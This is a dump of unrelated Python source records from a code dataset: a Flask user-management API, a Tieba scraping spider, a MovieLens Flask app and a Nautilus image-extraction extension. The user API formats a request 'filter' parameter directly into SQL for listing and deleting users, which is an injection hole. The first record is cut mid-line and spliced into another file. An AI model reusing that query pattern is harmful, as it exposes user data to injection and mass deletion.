reqparse.RequestParser()\ndel_parser.add_argument('Authorization', location='headers', help='Bearer token', required=True)\ndel_parser.add_argument('filter', type=str, required=False, help='Supported operators >,<,=,!=,AND,OR', location='args')\n\nmeta_data = api.model('meta',{\n\t'total_items': fields.Integer(required=True, description='Total users', example=5),\n\t'page': fields.Integer(required=True, description='Current page number', example=2, default=1),\n\t'total_pages': fields.Integer(required=True, description='Total pages', example=4),\n 'per_page': fields.Integer(required=True, description='Users per page', example=10, min=1)\n})\n\nuser_info = api.model('user',{\n\t'id': fields.Integer(required=True, description='User id', example=5),\n\t'username': fields.String(required=True, description='Username', example='athlete'),\n\t'role': fields.Integer(required=True, description='Roles - 0:user, 1:user_managiger, 2:admin', example=1),\n 'email': fields.String(required=True, description='user email', example='athlete@example.com'),\n 'subscriber': fields.Boolean(required=True, description='Is user a subscriber', example=True, default=True)\n})\n\nusers_list_response = api.model('UserList', {\n '_meta': fields.Nested(meta_data, description = 'Meta data'),\n 'items': fields.List(fields.Nested(user_info)),\n})\n\ndel_info = api.model('Del',{\n\t'count': fields.Integer(required=True, description='Number of users deleted', example=3)\n})\n\nput_fields = api.model('UpdateUser', {\n\t'password': fields.String(required=False, description='Password', example='secure_password'),\n 'username': fields.String(required=False, description='Username', example='athlete'),\n 'email': fields.String(required=False, description='Email', example='test@example.com')\n})\n\npost_fields = api.model('CreateUser', {\n\t'password': fields.String(required=True, description='Password', example='secure_password'),\n 'username': fields.String(required=True, description='Username', example='athlete'),\n 'email': fields.String(required=True, description='Email', example='test@example.com')\n})\n\n@users_ns.route('/all')\nclass UsersAllApi(Resource):\n\n\t@api.expect(parser, validate=True)\n\t@api.response(200, 'Success', model=users_list_response)\n\t@api.response(400, 'Invalid authentication header')\n\t@api.response(401, 'Authentication failed')\n\n\t@auth_required\n\t@jwt_required\n\t@role_required(ROLES['user_manager'])\n\tdef get(self):\n\t\t\"\"\" Read information of all users.\n\t\tNote : Cannot read information of users with higher role\"\"\"\n\t\tparser.parse_args()\n\t\tcurrent_user = User.query.get(get_jwt_identity())\n\t\tpage = request.args.get('page', 1, type=int)\n\t\tper_page = request.args.get('per_page', current_app.config['USERS_PER_PAGE'], type=int)\n\t\tif per_page > current_app.config['USERS_PER_PAGE']:\n\t\t\tper_page = current_app.config['USERS_PER_PAGE']\n\t\twhere_stmt = request.args.get('filter', \"\")\n\t\tif len(where_stmt)>0:\n\t\t\twhere_stmt = 'WHERE role<=%d AND (%s)' %(current_user.role, where_stmt)\n\t\telse:\n\t\t\twhere_stmt = 'WHERE role<=%d' %current_user.role\n\t\t(users, total) = filter_users(current_app, User.table_schema, 'user', where_stmt, page, per_page)\n\t\ttotal_pages = ceil(total/per_page)\n\t\tdata = User.to_dict_collection(users, page, per_page, total_pages)\n\t\tif total>page*per_page:\n\t\t\tdata['next_page'] = page+1\n\t\tif page>1:\n\t\t\tdata['prev_page'] = page-1\n\t\treturn make_response(jsonify(data), 200)\n\n\t@api.expect(del_parser, 
validate=True)\n\t@api.response(200, 'Success', model=del_info)\n\t@api.response(400, 'Invalid authentication header')\n\t@api.response(401, 'Authentication failed')\n\t@api.response(403, 'Permission denied')\n\n\t@auth_required\n\t@jwt_required\n\t@role_required(ROLES['user_manager'])\n\tdef delete(self):\n\t\t\"\"\" Delete all users. Cannot remove user with higher roles\"\"\"\n\t\tdel_parser.parse_args()\n\t\tcurrent_user = User.query.get(get_jwt_identity())\n\t\twhere_stmt = request.args.get('filter', \"\")\n\t\tif len(where_stmt)>0:\n\t\t\twhere_stmt = 'WHERE (role<=%d AND id!=%d) AND (%s)' %(current_user.role, current_user.id, where_stmt)\n\t\telse:\n\t\t\twhere_stmt = 'WHERE role<=%d AND id!=%d' %(current_user.role, current_user.id)\n\t\tcount = filter_delete(current_app, 'user', where_stmt)\n\t\treturn make_response(jsonify(count=count), 200)\n\n@users_ns.route('/')\nclass UserApi(Resource):\n\n\t@api.expect(token_parser, validate=True)\n\t@api.response(200, 'Success', model=user_info)\n\t@api.response(400, 'Invalid authentication header')\n\t@api.response(401, 'Authentication failed')\n\t@api.response(404, 'User not found')\n\n\t@auth_required\n\t@jwt_required\n\tdef get(self, id):\n\t\t\"\"\" Get information of a particular user. Access level is restricted by roles.\n\t\tuser : Can only access own information\n\t\tuser_manager : Can access information of all users and user_managers\n\t\tadmin : Can access information of everyone\"\"\"\n\t\tuser = User.query.get(id)\n\t\tcurrent_user = User.query.get(get_jwt_identity())\n\t\tif not user:\n\t\t\treturn error_response('USER NOT FOUND', 404)\n\t\tif int(id)!=int(get_jwt_identity()) and (current_user.role N:\n\t\t\t\twindow.pop(0)\n\t\t\t\tresult = [None]*len(tup)\n\t\t\t\tfor i in range(len(tup)): result[i] = [t[i] for t in window]\n\t\t\t\tprev_window = tuple(result)\n\ndef filter_tokenise(text):\n\ttext = text.lower()\n\tr = []\n\tfor w in re.split('[^0-9a-z\\.\\$]+',text):\n\t\tw = preprocess(w)\n\t\tif w: r.append(w)\n\treturn r\n\n\nnon_alphanum = re.compile('\\W') \nnumber = re.compile('[0-9]')\nsplitter = re.compile('[\\s\\.\\-\\/]+')\nmodel = re.compile('([.\\#]+\\w+|\\w+[.\\#]+)')\nstemmer = PorterStemmer()\nstop_words = set(nltk.corpus.stopwords.words('english'))\ndef preprocess(word):\n\tglobal users\n\tw = word\n\tw = w.lower()\n\tif w in stop_words: return\n\tw = number.sub(\"#\",w)\n\tif model.match(w): return #w = \"#MODEL#\"\n\tif w in users: return \"#USER#\"\n\tw = stemmer.stem_word(w)\n\tif len(w) < 3 : return\n\treturn w\n", "repo_name": "shawntan/tuning-machines", "sub_path": "lib/io/reader.py", "file_name": "reader.py", "file_ext": "py", "file_size_in_byte": 1695, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.localtime", "line_number": 17, "usage_type": "call"}, {"api_name": "re.split", "line_number": 53, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 59, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 60, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 61, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 62, "usage_type": "call"}, {"api_name": "nltk.stem.porter.PorterStemmer", "line_number": 63, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 64, "usage_type": "call"}, {"api_name": "nltk.corpus", "line_number": 64, "usage_type": "attribute"}]} +{"seq_id": "33135782049", "text": "# 百度贴吧crawl spider版本\nimport scrapy\nfrom 
scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom tieba.items import TiebaItem\n\n\nclass TbSpider(CrawlSpider):\n    name = 'tb'\n    allowed_domains = ['tieba.baidu.com']\n    start_urls = ['https://tieba.baidu.com/mo/q----,sz@320_240-1-3---2/m?kw=%E6%9D%8E%E6%AF%85&pn=0']\n    rules = (\n        # Note: special regex characters such as ? and . must be escaped. ✅\n        # Extract the link of each post\n        Rule(LinkExtractor(allow=r'm\\?kz=\\d+&is_bakan=\\d+&lp=\\d+&pinf=\\d+_\\d+_\\d+'), callback='parse_item'),\n        # Pagination\n        Rule(LinkExtractor(allow=r'm\\?kw=%E6%9D%8E%E6%AF%85&lp=\\d+&lm=&pn=\\d+'), follow=True),\n    )\n\n    def parse_item(self, response):\n        # Use the presence of item in meta to tell whether this is the first call\n        item = response.meta.get('item', None)\n        # If this is the first call\n        if not item:\n            item = TiebaItem()\n            item['img_url_list'] = list()  # urls of all images in the post\n            item['url'] = response.url  # url of the current post\n            item['title'] = response.xpath(\"//div[@class='bc p']/strong/text()\").extract_first()  # post title\n            item['poster'] = response.xpath(\n                \"//div[@class='d']/div[1]//span[@class='g']//a/text()\").extract_first()  # author of the post\n\n        # Add the image urls on the current page of the post to the list\n        item['img_url_list'] += response.xpath(\"//img[@class='BDE_Image']/@src\").extract()\n        # Get the url of the post's next page\n        next_url = response.xpath(\"//a[text()='下一页']/@href\").extract_first()\n\n        # Check whether the post has a next page\n        if next_url:  # if so, keep sending requests and extracting data\n            next_url = response.urljoin(next_url)\n            yield scrapy.Request(url=next_url, callback=self.parse_item, meta=dict(item=item))\n        else:  # if not, pass the item to the pipeline\n            yield item\n", "repo_name": "kenzzuli/hm_15", "sub_path": "spider/day10/tieba/tieba/spiders/tb.py", "file_name": "tb.py", "file_ext": "py", "file_size_in_byte": 1958, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.spiders.CrawlSpider", "line_number": 8, "usage_type": "name"}, {"api_name": "scrapy.spiders.Rule", "line_number": 15, "usage_type": "call"}, {"api_name": "scrapy.linkextractors.LinkExtractor", "line_number": 15, "usage_type": "call"}, {"api_name": "scrapy.spiders.Rule", "line_number": 17, "usage_type": "call"}, {"api_name": "scrapy.linkextractors.LinkExtractor", "line_number": 17, "usage_type": "call"}, {"api_name": "tieba.items.TiebaItem", "line_number": 25, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 40, "usage_type": "call"}]}
__tablename__ = 'movies'\r\n    movieId = Column(Integer, primary_key=True)\r\n    title = Column(String)\r\n    genres = Column(String(50))\r\n\r\nclass newtable(db.Model):\r\n    __tablename__ = 'newtable'\r\n\r\n    movieId = db.Column(db.Integer, primary_key=True)\r\n    avg_rating = db.Column(db.Float)\r\n    rating_count = db.Column(db.Integer)\r\n\r\n\r\nclass newtable2(db.Model):\r\n    __tablename__ = 'newtable2'\r\n    title = db.Column(VARCHAR(255))\r\n    userId = db.Column(LONGTEXT)\r\n    rating = db.Column(Float)\r\n    idd=db.Column(Integer, primary_key=True)\r\n\r\n\r\nclass links(db.Model):\r\n    __tablename__ = 'links'\r\n    linkid= Column(Integer,primary_key=True)\r\n    movieId = Column(Integer, ForeignKey('movies.movieId'))\r\n    tmdbId = Column(Integer)\r\n    imdbId = Column(CHAR(9))\r\n\r\nclass ratings(db.Model):\r\n    __tablename__ = 'ratings'\r\n    userId = Column(Integer)\r\n    movieId = Column(Integer, ForeignKey('movies.movieId'))\r\n    rating = Column(Float)\r\n    timestamp = Column(BIGINT)\r\n    id = Column(VARCHAR(100),primary_key=True)\r\n\r\n\r\nmovie = relationship(\"movies\", back_populates=\"ratings\")\r\n\r\n\r\n#UNUSED TABLES \r\n\"\"\"\r\n\r\nclass genome_tags(db.Model):\r\n    __tablename__ = 'genome_tags'\r\n    tagId = Column(Integer, ForeignKey('genome_scores.tagId'))\r\n    tag = Column(VARCHAR(255))\r\n\r\nclass genome_scores(db.Model):\r\n    __tablename__ = 'genome_scores'\r\n    movieId = Column(Integer, ForeignKey('movies.movieId'))\r\n    tagId = Column(Integer,primary_key=True)\r\n    relevence = Column(Float)\r\n\r\nclass tags(db.Model):\r\n    __tablename__ = 'tags'\r\n    tagid= Column(Integer,primary_key=True)\r\n    userId = Column(Integer)\r\n    movieId = Column(Integer, ForeignKey('movies.movieId'))\r\n    tag = Column(VARCHAR(255))\r\n    timestamp = Column(BIGINT)\r\n    \"\"\"\r\n\r\n\r\n\r\n###############################\r\n#creating new table2 (newtable2=each movie with all users)\r\n'''\r\ndef create_newtable2():\r\n    with app.app_context():\r\n        db.create_all()\r\n        insert_query = text(\r\n            \"SELECT movies.title, GROUP_CONCAT(DISTINCT ratings.userId) AS users , ratings.rating FROM movies JOIN ratings ON movies.movieId = ratings.movieId GROUP BY movies.movieId, ratings.rating HAVING COUNT(DISTINCT ratings.userId) > 10\")\r\n        engine.execute(insert_query)\r\ncreate_newtable2() \r\n'''\r\n#creating new table (newtable= each movie with avg rating and count )\r\n\r\n''' \r\n\r\ndef create_newtable():\r\n    with app.app_context():\r\n        db.create_all()\r\n        insert_query = text(\r\n            \"SELECT movieId, AVG(rating), COUNT(rating) FROM ratings GROUP BY movieId\")\r\n        engine.execute(insert_query)\r\ncreate_newtable() \r\n'''\r\n###############################\r\n    # Create a session to the database\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\n\r\n@app.route('/', methods=['GET'])\r\ndef view_movies():\r\n    # Query the database for all movies\r\n    data = session.query(movies).all()\r\n    #data=movies.query.all()\r\n    return render_template('index.html',data=data)\r\n\r\n\r\n@app.route('/search', methods=['GET', 'POST'])\r\ndef search():\r\n    \r\n    query = request.form.get('search')\r\n    results = session.query(movies).filter(movies.title.like('%' + query + '%')).all()\r\n\r\n    return render_template('search.html',results=results, 
query=query)\r\n\r\n\r\n###################################################################################################################################\r\n###################################################################################################################################\r\n###################################################################################################################################\r\n#ROUTE FOR ALL GENRES (I USED TABLE BUTON )\r\n@app.route('/action', methods=['GET', 'POST'])\r\ndef action():\r\n \r\n action=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'action' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('action.html',action=action)\r\n\r\n@app.route('/adventure', methods=['GET', 'POST'])\r\ndef adventure():\r\n \r\n adventure=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'adventure' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('adventure.html',adventure=adventure)\r\n\r\n@app.route('/animation', methods=['GET', 'POST'])\r\ndef animation():\r\n \r\n animation=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'animation' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('animation.html',animation=animation)\r\n\r\n@app.route('/children', methods=['GET', 'POST'])\r\ndef children():\r\n children=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'children' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('children.html',children=children)\r\n\r\n@app.route('/comedy', methods=['GET', 'POST'])\r\ndef comedy():\r\n comedy=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'comedy' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('comedy.html',comedy=comedy)\r\n\r\n@app.route('/crime', methods=['GET', 'POST'])\r\ndef crime():\r\n crime=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'crime' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('crime.html',crime=crime)\r\n\r\n@app.route('/documentary', methods=['GET', 'POST'])\r\ndef documentary():\r\n documentary=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n 
.filter(movies.genres.like('%' + 'documentary' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('documentary.html',documentary=documentary)\r\n\r\n@app.route('/drama', methods=['GET', 'POST'])\r\ndef drama():\r\n drama=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'drama' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('drama.html',drama=drama)\r\n\r\n@app.route('/fantasy', methods=['GET', 'POST'])\r\ndef fantasy():\r\n fantasy=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'fantasy' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('fantasy.html',fantasy=fantasy)\r\n\r\n\r\n@app.route('/filmnoir', methods=['GET', 'POST'])\r\ndef filmnoir():\r\n filmnoir=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'filmnoir' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('filmnoir.html',filmnoir=filmnoir)\r\n\r\n@app.route('/horror', methods=['GET', 'POST'])\r\ndef horror():\r\n horror=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'horror' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('horror.html',horror=horror)\r\n\r\n@app.route('/musical', methods=['GET', 'POST'])\r\ndef musical():\r\n musical=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'musical' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('musical.html',musical=musical)\r\n\r\n@app.route('/mystery', methods=['GET', 'POST'])\r\ndef mystery():\r\n mystery=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'mystery' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('mystery.html',mystery=mystery)\r\n\r\n@app.route('/romance', methods=['GET', 'POST'])\r\ndef romance():\r\n romance=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'romance' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('romance.html',romance=romance)\r\n\r\n@app.route('/scifi', methods=['GET', 'POST'])\r\ndef scifi():\r\n 
scifi=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'scifi' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('scifi.html',scifi=scifi)\r\n\r\n@app.route('/thriller', methods=['GET', 'POST'])\r\ndef thriller():\r\n thriller=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'thriller' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('thriller.html',thriller=thriller)\r\n\r\n\r\n@app.route('/war', methods=['GET', 'POST'])\r\ndef war():\r\n war=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'war' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('war.html',war=war)\r\n\r\n@app.route('/western', methods=['GET', 'POST'])\r\ndef western():\r\n western=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'western' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('western.html',western=western)\r\n###################################################################################################################################\r\n###################################################################################################################################\r\n###################################################################################################################################\r\n@app.route('/users', methods=['GET', 'POST'])\r\ndef users():\r\n users =db.session.query(newtable2).all()\r\n return render_template('users.html', users=users)\r\n\r\n\r\n@app.route('/allusers', methods=['GET', 'POST'])\r\ndef allusers():\r\n quer = request.form.get('user')\r\n allusers = session.query(newtable2).filter(newtable2.title.like('%' + quer + '%')).all()\r\n return render_template('allusers.html', allusers=allusers)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n\r\n\r\n\r\n'''\r\n# Query the database for all movies\r\nmo = session.query(ratings).all()\r\nmovie_id = mo[0].rating\r\n\r\n# Print the titles of all the movies\r\nprint(movie_id)\r\n \r\n\r\n# Close the session\r\nsession.close()\r\n'''\r\n", "repo_name": "semlanimehdi/Movielens-webapp-", "sub_path": "movielenss copy.py", "file_name": "movielenss copy.py", "file_ext": "py", "file_size_in_byte": 15844, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 19, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", 
"line_number": 36, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 36, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 37, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 37, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 50, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.LONGTEXT", "line_number": 51, "usage_type": "argument"}, {"api_name": "sqlalchemy.Float", "line_number": 52, "usage_type": "argument"}, {"api_name": "sqlalchemy.Integer", "line_number": 53, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 58, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 59, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 59, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 59, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 60, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 60, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.CHAR", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 65, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 65, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 66, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 66, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 66, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 67, "usage_type": "call"}, {"api_name": "sqlalchemy.Float", "line_number": 67, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 68, "usage_type": "call"}, {"api_name": "sqlalchemy.BIGINT", "line_number": 68, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 69, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 69, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 72, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 125, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 140, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 140, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 140, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 143, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 159, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 170, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 191, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 201, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 221, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 231, 
"usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 241, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 252, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 262, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 272, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 282, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 292, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 302, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 312, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 323, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 333, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 340, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 345, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 345, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 345, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 347, "usage_type": "call"}]} +{"seq_id": "5871669098", "text": "import gi\ntry:\n gi.require_version('Gtk', '3.0')\n gi.require_version('GObject', '2.0')\n gi.require_version('GLib', '2.0')\n gi.require_version('Nautilus', '3.0')\nexcept Exception as e:\n print(e)\n exit(-1)\nfrom gi.repository import Gtk\nfrom gi.repository import GObject\nfrom gi.repository import GLib\nfrom gi.repository import Nautilus as FileManager\nfrom zipfile import ZipFile\nimport os\nimport shutil\nfrom threading import Thread\nimport mimetypes\nfrom urllib import unquote_plus\n\nAPP = '$APP$'\nVERSION = '$VERSION$'\n\nCONFIG_DIR = os.path.join(os.path.expanduser('~'), '.config', APP.lower())\nif not os.path.exists(CONFIG_DIR):\n os.makedirs(CONFIG_DIR)\nCONFIG_FILE = os.path.join(CONFIG_DIR, '{0}.conf'.format(APP.lower()))\n\nMARGIN = 10\nMIMETYPES = ['application/vnd.oasis.opendocument.text',\n 'application/vnd.oasis.opendocument.text-template',\n 'application/vnd.oasis.opendocument.graphics',\n 'application/vnd.oasis.opendocument.graphics-template',\n 'application/vnd.oasis.opendocument.presentation',\n 'application/vnd.oasis.opendocument.presentation-template',\n 'application/vnd.oasis.opendocument.spreadsheet',\n 'application/vnd.oasis.opendocument.spreadsheet-template']\nMIMETYPES_IMAGES = ['image/png',\n 'image/jpeg',\n 'image/bmp',\n 'image/gif',\n 'image/tiff',\n 'image/x-tiff']\n_ = str\n\n\ndef get_files(files_in):\n files = []\n for file_in in files_in:\n print(file_in)\n file_in = unquote_plus(file_in.get_uri()[7:])\n if os.path.isfile(file_in):\n files.append(file_in)\n return files\n\n\ndef extract_images(orginalFile):\n filename, fileextension = os.path.splitext(orginalFile)\n destFolder = '{0}_images'.format(filename)\n\n if os.path.exists(destFolder):\n shutil.rmtree(destFolder, True)\n os.makedirs(destFolder)\n\n with ZipFile(orginalFile, 'r') as myzip:\n for element in myzip.infolist():\n filename = element.filename.decode()\n if filename.startswith('Pictures/') and\\\n mimetypes.guess_type(\n 'file://' + filename)[0] in MIMETYPES_IMAGES:\n print(element.filename, type(element))\n name = element.filename[9:]\n unpacked = open(os.path.join(destFolder, name), 'w')\n unpacked.write(myzip.read(filename))\n unpacked.close()\n\n\nclass ProgressDialog(Gtk.Dialog):\n __gsignals__ = {\n 'i-want-stop': 
(GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE, ()),\n    }\n\n    def __init__(self, title, parent, max_value):\n        Gtk.Dialog.__init__(self, title, parent)\n        self.set_position(Gtk.WindowPosition.CENTER_ALWAYS)\n        self.set_size_request(330, 30)\n        self.set_resizable(False)\n        self.connect('destroy', self.close)\n        self.set_modal(True)\n        vbox = Gtk.VBox(spacing=5)\n        vbox.set_border_width(5)\n        self.get_content_area().add(vbox)\n        #\n        frame1 = Gtk.Frame()\n        vbox.pack_start(frame1, True, True, 0)\n        table = Gtk.Table(2, 2, False)\n        frame1.add(table)\n        #\n        self.label = Gtk.Label()\n        table.attach(self.label, 0, 2, 0, 1,\n                     xpadding=5,\n                     ypadding=5,\n                     xoptions=Gtk.AttachOptions.SHRINK,\n                     yoptions=Gtk.AttachOptions.EXPAND)\n        #\n        self.progressbar = Gtk.ProgressBar()\n        self.progressbar.set_size_request(300, 0)\n        table.attach(self.progressbar, 0, 1, 1, 2,\n                     xpadding=5,\n                     ypadding=5,\n                     